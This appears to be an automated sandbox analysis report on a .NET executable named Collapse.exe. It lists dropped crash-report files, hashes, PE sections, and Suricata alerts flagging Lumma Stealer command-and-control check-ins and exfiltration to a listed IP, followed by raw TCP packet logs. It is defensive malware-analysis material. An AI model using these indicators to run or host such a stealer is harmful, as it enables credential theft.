                                          Encrypted:false
                                          SSDEEP:192:R6l7wVeJX961T6YEIASUaigmffVJzprt89bQOsfDfEQm:R6lXJN6x6YEfSUaigmffVJEQNfDfC
                                          MD5:733C2521AC3140DAC2D9D81322DABD7E
                                          SHA1:65AFE6725D479B5700813A666231AAA5E4F015B6
                                          SHA-256:702C42551236C209409E4F70A080C141111F17F8CC342BED57ADC1D48BE7E388
                                          SHA-512:790996C4E7B4727F50E1FCA4BCF85BB1563BFF059251CC1E5908AFBDDE0FD6EC344AB4BE6111544B320E5458A42ACA98AD3B320053E3CCFA0DCC16FF973455C2
                                          Malicious:false
                                          Reputation:low
                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.7.6.0.<./.P.i.

                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER645F.tmp.xml

                                          Download File
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):4740
                                          Entropy (8bit):4.440337519675697
                                          Encrypted:false
                                          SSDEEP:48:cvIwWl8zsuJg77aI9YrWpW8VY6Ym8M4JAdxPcf6FR+q8vkdxPcfUOSxvIMM5Cd:uIjfkI7Ka7V6JRfaKVfUOSxvIMM5Cd
                                          MD5:B08802DC3D0E1EB8A560715164692946
                                          SHA1:8D20A9670ECD1E9C2E207848A97BFA4A44142941
                                          SHA-256:E4376A7CB322448133AEFB9529A461FA595911C120839EF335E40A747C400DC6
                                          SHA-512:30CC45C89773D472E676E25EA0BB5A9D9DF1F35A0441D28F5C7C62BF40E48D58CCA054D7B54E2158F971F4C1E78C463D0051C685616DCBCDB04C903A8F76E8E7
                                          Malicious:false
                                          Reputation:low
                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="747659" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                          C:\Windows\appcompat\Programs\Amcache.hve

                                          Download File
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:MS Windows registry file, NT/2000 or above
                                          Category:dropped
                                          Size (bytes):1835008
                                          Entropy (8bit):4.4217244767449495
                                          Encrypted:false
                                          SSDEEP:6144:ySvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNa0uhiTw9:BvloTMW+EZMM6DFyg03w9
                                          MD5:EC7A67661E2DDBA9F7DB80B58D6449A9
                                          SHA1:3CC709A4264BAC5618CFEBBD1DCF821106AF7012
                                          SHA-256:2978565BEF7062F4E7FB63AA5C2A803E431E3C8CA23908A702017D6F6B757BEF
                                          SHA-512:A2D3C6FC5EB57FFABA354EFA3F64DF7DFEDBB05350D82791540BD4263DD017DF6F061D1194133AF131E0137AD51EA04F60B571242FF8E3FA716095B6A4D3DA98
                                          Malicious:false
                                          Reputation:low
                                          Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):7.912331822794405
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                          • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          File name:Collapse.exe
                                          File size:425'984 bytes
                                          MD5:04eacc602d626eba16224fdc15ef8aa5
                                          SHA1:b34ada743e5e4ed6b34ae2894b057f8df75efb71
                                          SHA256:6ac6fce5dddcd7e72952ba3c2e36e92c5c4aac45e2b5226060421193e882d996
                                          SHA512:08d52e98bd95230f6478396dc3a1e43cd77e8284a3f6c703900ee02a0f8433b2e83159b3cb3b1dfccc951727c9e58b651be4ad3b888f0bd7ec24cbf80a31565f
                                          SSDEEP:12288:z/8Xg+W5MHFU2Ahl3kk1M/vHixeG0XG9otBlyR0u:zgTlU2Ar4/Pi4K9oteD
                                          TLSH:729412497BC8AB72C9A056B5C0F3596582F0E1871977F3C53F441E945F827988E743CA
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.................. ........@.. ....................................`................................

                                          File Icon

                                          Icon Hash:90cececece8e8eb0

                                          Static PE Info

                                          General

                                          Entrypoint:0x40e50e
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0xAFA985D8 [Wed May 23 05:10:48 2063 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                          Entrypoint Preview

                                          Instruction
                                          jmp dword ptr [00402000h]
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xe4c00x4b.text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x100000x598.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x120000xc.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0xe4780x1c.text
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x20000xc5140xc600c8e98fba2c864102aff8d83a8ccc0220False0.5807686237373737data6.1883466777474085IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rsrc0x100000x5980x60045944832ca66f37df2a22d1e745bbda0False0.4114583333333333data4.028483779114603IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc0x120000xc0x200f9bf38b490c2b4dad223aadf230001d0False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                          .CSS0x140000x5ae000x5ae00243d65d1b33ccd8e4f34c8020ba184e2False1.0003250730742779data7.999532940349531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                          Resources

                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_VERSION0x100a00x30cdata0.4230769230769231
                                          RT_MANIFEST0x103ac0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                          Imports

                                          DLLImport
                                          mscoree.dll_CorExeMain

                                          Version Infos

                                          DescriptionData
                                          Translation0x0000 0x04b0
                                          Comments
                                          CompanyName
                                          FileDescriptionPolitic
                                          FileVersion1.0.0.0
                                          InternalNamePolitic.exe
                                          LegalCopyrightCopyright 2025
                                          LegalTrademarks
                                          OriginalFilenamePolitic.exe
                                          ProductNamePolitic
                                          ProductVersion1.0.0.0
                                          Assembly Version1.0.0.0

                                          Network Behavior

                                          Suricata IDS Alerts

                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                          2025-03-05T14:57:19.214933+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549704149.154.167.99443TCP
                                          2025-03-05T14:57:20.010753+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549705188.114.97.3443TCP
                                          2025-03-05T14:57:22.449792+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549705188.114.97.3443TCP
                                          2025-03-05T14:57:22.449792+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549705188.114.97.3443TCP
                                          2025-03-05T14:57:22.954670+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549712188.114.97.3443TCP
                                          2025-03-05T14:57:23.516026+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549712188.114.97.3443TCP
                                          2025-03-05T14:57:24.255162+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549713188.114.97.3443TCP
                                          2025-03-05T14:57:25.813429+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549714188.114.97.3443TCP
                                          2025-03-05T14:57:27.573571+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549714188.114.97.3443TCP
                                          2025-03-05T14:57:28.170505+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549715188.114.97.3443TCP
                                          2025-03-05T14:57:32.599119+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549719188.114.97.3443TCP
                                          2025-03-05T14:57:33.820271+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549722188.114.97.3443TCP
                                          2025-03-05T14:57:37.205618+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549728188.114.97.3443TCP
                                          2025-03-05T14:57:39.257381+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549728188.114.97.3443TCP

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Mar 5, 2025 14:57:18.563942909 CET49704443192.168.2.5149.154.167.99
                                          Mar 5, 2025 14:57:18.563988924 CET44349704149.154.167.99192.168.2.5
                                          Mar 5, 2025 14:57:18.564058065 CET49704443192.168.2.5149.154.167.99
                                          Mar 5, 2025 14:57:18.565562010 CET49704443192.168.2.5149.154.167.99
                                          Mar 5, 2025 14:57:18.565581083 CET44349704149.154.167.99192.168.2.5
                                          Mar 5, 2025 14:57:19.214802980 CET44349704149.154.167.99192.168.2.5
                                          Mar 5, 2025 14:57:19.214932919 CET49704443192.168.2.5149.154.167.99
                                          Mar 5, 2025 14:57:19.228290081 CET49704443192.168.2.5149.154.167.99
                                          Mar 5, 2025 14:57:19.228339911 CET44349704149.154.167.99192.168.2.5
                                          Mar 5, 2025 14:57:19.229338884 CET44349704149.154.167.99192.168.2.5
                                          Mar 5, 2025 14:57:19.272516012 CET49704443192.168.2.5149.154.167.99
                                          Mar 5, 2025 14:57:19.286473036 CET49704443192.168.2.5149.154.167.99
                                          Mar 5, 2025 14:57:19.328324080 CET44349704149.154.167.99192.168.2.5
                                          Mar 5, 2025 14:57:19.477807999 CET44349704149.154.167.99192.168.2.5
                                          Mar 5, 2025 14:57:19.477871895 CET44349704149.154.167.99192.168.2.5
                                          Mar 5, 2025 14:57:19.477891922 CET44349704149.154.167.99192.168.2.5
                                          Mar 5, 2025 14:57:19.477927923 CET44349704149.154.167.99192.168.2.5
                                          Mar 5, 2025 14:57:19.477935076 CET49704443192.168.2.5149.154.167.99
                                          Mar 5, 2025 14:57:19.477965117 CET44349704149.154.167.99192.168.2.5
                                          Mar 5, 2025 14:57:19.477987051 CET49704443192.168.2.5149.154.167.99
                                          Mar 5, 2025 14:57:19.478005886 CET49704443192.168.2.5149.154.167.99
                                          Mar 5, 2025 14:57:19.478012085 CET44349704149.154.167.99192.168.2.5
                                          Mar 5, 2025 14:57:19.478070021 CET44349704149.154.167.99192.168.2.5
                                          Mar 5, 2025 14:57:19.478117943 CET49704443192.168.2.5149.154.167.99
                                          Mar 5, 2025 14:57:19.481570959 CET49704443192.168.2.5149.154.167.99
                                          Mar 5, 2025 14:57:19.481585026 CET44349704149.154.167.99192.168.2.5
                                          Mar 5, 2025 14:57:19.481600046 CET49704443192.168.2.5149.154.167.99
                                          Mar 5, 2025 14:57:19.481605053 CET44349704149.154.167.99192.168.2.5
                                          Mar 5, 2025 14:57:19.506010056 CET49705443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:19.506037951 CET44349705188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:19.506108999 CET49705443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:19.506738901 CET49705443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:19.506756067 CET44349705188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:20.010682106 CET44349705188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:20.010752916 CET49705443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:20.013755083 CET49705443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:20.013780117 CET44349705188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:20.014193058 CET44349705188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:20.015610933 CET49705443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:20.015642881 CET49705443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:20.015708923 CET44349705188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:22.449803114 CET44349705188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:22.449913979 CET44349705188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:22.450006962 CET49705443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:22.451493025 CET49705443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:22.451514006 CET44349705188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:22.455863953 CET49712443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:22.455902100 CET44349712188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:22.455985069 CET49712443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:22.456237078 CET49712443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:22.456250906 CET44349712188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:22.954559088 CET44349712188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:22.954669952 CET49712443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:22.958930016 CET49712443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:22.958945036 CET44349712188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:22.959338903 CET44349712188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:22.967647076 CET49712443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:22.967668056 CET49712443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:22.967802048 CET44349712188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:23.516031027 CET44349712188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:23.516092062 CET44349712188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:23.516128063 CET44349712188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:23.516155005 CET44349712188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:23.516166925 CET49712443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:23.516191006 CET44349712188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:23.516205072 CET49712443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:23.516235113 CET44349712188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:23.516272068 CET49712443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:23.516277075 CET44349712188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:23.516717911 CET44349712188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:23.516772032 CET49712443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:23.516777992 CET44349712188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:23.516925097 CET44349712188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:23.516966105 CET49712443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:23.516971111 CET44349712188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:23.520904064 CET44349712188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:23.520983934 CET49712443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:23.520998955 CET44349712188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:23.562716961 CET49712443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:23.609860897 CET44349712188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:23.609936953 CET44349712188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:23.609982967 CET49712443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:23.610008001 CET44349712188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:23.655637026 CET44349712188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:23.655719042 CET49712443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:23.659914017 CET49712443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:23.659945011 CET44349712188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:23.659960032 CET49712443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:23.659965992 CET44349712188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:23.771279097 CET49713443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:23.771308899 CET44349713188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:23.771389008 CET49713443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:23.771667957 CET49713443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:23.771682978 CET44349713188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:24.255076885 CET44349713188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:24.255162001 CET49713443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:24.256474018 CET49713443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:24.256483078 CET44349713188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:24.256877899 CET44349713188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:24.261987925 CET49713443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:24.262136936 CET49713443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:24.262177944 CET44349713188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:25.303967953 CET44349713188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:25.304080009 CET44349713188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:25.304296017 CET49713443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:25.304460049 CET49713443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:25.321156979 CET49714443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:25.321182966 CET44349714188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:25.321294069 CET49714443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:25.321583033 CET49714443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:25.321595907 CET44349714188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:25.813327074 CET44349714188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:25.813429117 CET49714443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:25.814970970 CET49714443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:25.814985037 CET44349714188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:25.815385103 CET44349714188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:25.816653013 CET49714443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:25.816803932 CET49714443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:25.816840887 CET44349714188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:25.816920042 CET49714443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:25.860325098 CET44349714188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:27.573621035 CET44349714188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:27.573842049 CET44349714188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:27.573929071 CET49714443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:27.573992014 CET49714443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:27.574026108 CET44349714188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:27.659578085 CET49715443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:27.659601927 CET44349715188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:27.660329103 CET49715443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:27.668332100 CET49715443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:27.668349981 CET44349715188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:28.170207977 CET44349715188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:28.170505047 CET49715443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:28.171710014 CET49715443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:28.171720982 CET44349715188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:28.172205925 CET44349715188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:28.173590899 CET49715443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:28.173590899 CET49715443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:28.173636913 CET44349715188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:28.173721075 CET49715443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:28.173729897 CET44349715188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:31.902564049 CET44349715188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:31.902661085 CET44349715188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:31.902719021 CET49715443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:31.909698963 CET49715443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:31.909718990 CET44349715188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:32.120346069 CET49719443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:32.120364904 CET44349719188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:32.120676041 CET49719443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:32.121279001 CET49719443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:32.121289015 CET44349719188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:32.598936081 CET44349719188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:32.599118948 CET49719443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:32.600326061 CET49719443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:32.600342035 CET44349719188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:32.600651026 CET44349719188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:32.602375984 CET49719443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:32.602461100 CET49719443192.168.2.5188.114.97.3
                                          Mar 5, 2025 14:57:32.602488041 CET44349719188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:33.039304018 CET44349719188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:33.039393902 CET44349719188.114.97.3192.168.2.5
                                          Mar 5, 2025 14:57:33.039489985 CET49719443192.168.2.5188.114.97.3
